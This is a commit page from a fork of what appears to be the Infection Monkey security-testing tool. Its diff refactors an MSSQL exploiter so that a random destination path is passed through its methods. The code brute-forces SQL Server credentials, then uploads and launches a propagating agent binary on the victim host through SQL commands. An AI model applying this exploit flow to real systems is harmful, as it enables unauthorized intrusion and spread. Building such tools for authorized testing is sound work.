p41275903
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Agent: User random binary destination path for MSSQL Exploit

This commit is contained in:
Ilija Lazoroski 2022-03-23 17:21:53 +01:00 committed by Mike Salvatore
parent cad5fa4897
commit 51cfb73ce0
1 changed files with 21 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -1,5 +1,6 @@
import logging import logging
import os import os
from pathlib import Path
from time import sleep from time import sleep
import pymssql import pymssql
@ -59,6 +60,8 @@ class MSSQLExploiter(HostExploiter):
Also, don't forget to start_monkey_server() before self.upload_monkey() and Also, don't forget to start_monkey_server() before self.upload_monkey() and
self.stop_monkey_server() after self.stop_monkey_server() after
""" """
monkey_path_on_victim = get_agent_dest_path(self.host, self.options)
# Brute force to get connection # Brute force to get connection
creds = generate_identity_secret_pairs( creds = generate_identity_secret_pairs(
self.options["credentials"]["exploit_user_list"], self.options["credentials"]["exploit_user_list"],
@ -82,14 +85,14 @@ class MSSQLExploiter(HostExploiter):
self.create_temp_dir() self.create_temp_dir()
self.create_empty_payload_file() self.create_empty_payload_file()
http_thread = self.start_monkey_server() http_thread = self.start_monkey_server(monkey_path_on_victim)
self.upload_monkey() self.upload_monkey(monkey_path_on_victim)
MSSQLExploiter._stop_monkey_server(http_thread) MSSQLExploiter._stop_monkey_server(http_thread)
# Clear payload to pass in another command # Clear payload to pass in another command
self.create_empty_payload_file() self.create_empty_payload_file()
self.run_monkey() self.run_monkey(monkey_path_on_victim)
self.remove_temp_dir() self.remove_temp_dir()
except Exception as e: except Exception as e:
@ -129,8 +132,8 @@ class MSSQLExploiter(HostExploiter):
raise Exception("Couldn't execute MSSQL exploiter because payload was too long") raise Exception("Couldn't execute MSSQL exploiter because payload was too long")
self.run_mssql_commands(array_of_commands) self.run_mssql_commands(array_of_commands)
def run_monkey(self): def run_monkey(self, monkey_path_on_victim: Path):
monkey_launch_command = self.get_monkey_launch_command() monkey_launch_command = self.get_monkey_launch_command(monkey_path_on_victim)
self.run_mssql_command(monkey_launch_command) self.run_mssql_command(monkey_launch_command)
self.run_payload_file() self.run_payload_file()
@ -139,8 +142,8 @@ class MSSQLExploiter(HostExploiter):
self.cursor.execute(cmd) self.cursor.execute(cmd)
sleep(MSSQLExploiter.QUERY_BUFFER) sleep(MSSQLExploiter.QUERY_BUFFER)
def upload_monkey(self): def upload_monkey(self, monkey_path_on_victim: Path):
monkey_download_command = self.write_download_command_to_payload() monkey_download_command = self.write_download_command_to_payload(monkey_path_on_victim)
self.run_payload_file() self.run_payload_file()
self.add_executed_cmd(monkey_download_command.command) self.add_executed_cmd(monkey_download_command.command)
@ -155,10 +158,9 @@ class MSSQLExploiter(HostExploiter):
) )
self.run_mssql_command(tmp_dir_removal_command) self.run_mssql_command(tmp_dir_removal_command)
def start_monkey_server(self) -> LockedHTTPServer: def start_monkey_server(self, monkey_path_on_victim: Path) -> LockedHTTPServer:
dst_path = get_agent_dest_path(self.host, self.options)
self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.agent_http_path, http_thread = HTTPTools.create_locked_transfer(
self.host, dst_path, self.agent_repository self.host, str(monkey_path_on_victim), self.agent_repository
) )
return http_thread return http_thread
@ -167,27 +169,27 @@ class MSSQLExploiter(HostExploiter):
http_thread.stop() http_thread.stop()
http_thread.join(LONG_REQUEST_TIMEOUT) http_thread.join(LONG_REQUEST_TIMEOUT)
def write_download_command_to_payload(self): def write_download_command_to_payload(self, monkey_path_on_victim: Path):
monkey_download_command = self.get_monkey_download_command() monkey_download_command = self.get_monkey_download_command(monkey_path_on_victim)
self.run_mssql_command(monkey_download_command) self.run_mssql_command(monkey_download_command)
return monkey_download_command return monkey_download_command
def get_monkey_launch_command(self): def get_monkey_launch_command(self, monkey_path_on_victim: Path):
dst_path = get_agent_dest_path(self.host, self.options)
# Form monkey's launch command # Form monkey's launch command
monkey_args = build_monkey_commandline(self.host, self.current_depth - 1, dst_path) monkey_args = build_monkey_commandline(
self.host, self.current_depth - 1, monkey_path_on_victim
)
suffix = ">>{}".format(self.payload_file_path) suffix = ">>{}".format(self.payload_file_path)
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
return MSSQLLimitedSizePayload( return MSSQLLimitedSizePayload(
command="{} {} {}".format(dst_path, DROPPER_ARG, monkey_args), command="{} {} {}".format(monkey_path_on_victim, DROPPER_ARG, monkey_args),
prefix=prefix, prefix=prefix,
suffix=suffix, suffix=suffix,
) )
def get_monkey_download_command(self): def get_monkey_download_command(self, monkey_path_on_victim: Path):
dst_path = get_agent_dest_path(self.host, self.options)
monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format( monkey_download_command = MSSQLExploiter.MONKEY_DOWNLOAD_COMMAND.format(
http_path=self.agent_http_path, dst_path=dst_path http_path=self.agent_http_path, dst_path=str(monkey_path_on_victim)
) )
prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX prefix = MSSQLExploiter.EXPLOIT_COMMAND_PREFIX
suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format( suffix = MSSQLExploiter.EXPLOIT_COMMAND_SUFFIX.format(